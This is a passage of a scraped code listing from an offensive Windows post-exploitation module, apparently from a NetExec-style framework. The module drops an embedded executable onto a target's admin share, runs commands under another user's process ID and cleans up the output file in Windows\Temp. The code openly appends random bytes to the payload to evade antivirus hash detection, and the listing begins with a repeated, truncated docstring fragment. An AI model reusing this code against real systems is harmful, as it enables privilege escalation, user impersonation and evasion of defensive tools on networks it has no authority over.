r""" PID // Process ID for Target User, PID=pid EXEC // Command to exec, EXEC='command' Single quote is better to use This module reads the executed command output under the name C:\windows\temp\output.txt and deletes it. In case of a possible error, it may need
(self, context, module_options)
| 18 | category = CATEGORY.PRIVILEGE_ESCALATION |
| 19 | |
| 20 | def options(self, context, module_options): |
| 21 | r""" |
| 22 | PID // Process ID for Target User, PID=pid |
| 23 | EXEC // Command to exec, EXEC='command' Single quote is better to use |
| 24 | |
| 25 | This module reads the executed command output under the name C:\windows\temp\output.txt and deletes it. In case of a possible error, it may need to be deleted manually. |
| 26 | """ |
| 27 | self.tmp_dir = "C:\\Windows\\Temp\\" |
| 28 | self.share = "C$" |
| 29 | self.tmp_share = self.tmp_dir.split(":")[1] |
| 30 | self.pi = "pi.exe" |
| 31 | self.useembeded = True |
| 32 | self.pid = self.cmd = "" |
| 33 | |
| 34 | with open(join(DATA_PATH, ("pi_module/pi.bs64"))) as pi_file: |
| 35 | self.pi_embedded = b64decode(pi_file.read()) |
| 36 | |
| 37 | # Add some random binary data to defeat AVs which check the file hash |
| 38 | self.pi_embedded += datetime.now().strftime("%Y%m%d%H%M%S").encode() |
| 39 | |
| 40 | if "EXEC" in module_options: |
| 41 | self.cmd = module_options["EXEC"] |
| 42 | |
| 43 | if "PID" in module_options: |
| 44 | self.pid = module_options["PID"] |
| 45 | |
| 46 | def on_admin_login(self, context, connection): |
| 47 | if self.useembeded: |
no test coverage detected